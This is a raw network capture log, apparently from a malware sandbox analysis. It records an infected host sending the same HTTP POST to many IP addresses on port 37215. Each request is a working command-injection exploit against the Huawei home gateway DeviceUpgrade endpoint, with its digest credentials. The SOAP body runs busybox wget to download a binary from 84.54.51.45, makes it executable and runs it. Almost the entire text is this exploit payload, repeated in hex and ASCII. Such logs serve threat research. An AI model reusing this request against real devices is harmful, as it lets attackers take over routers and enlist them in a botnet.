                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1452192.168.2.154614041.21.21.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734664917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1453192.168.2.155472441.14.160.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734704018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1454192.168.2.155362241.51.202.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734741926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1455192.168.2.153842441.13.125.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734745979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1456192.168.2.153959841.243.243.21337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734745979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1457192.168.2.155825841.74.13.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734795094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1458192.168.2.156058241.255.93.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734816074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1459192.168.2.154890441.205.77.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734843016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1460192.168.2.154475241.95.248.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734858990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1461192.168.2.155304241.222.140.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734895945 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
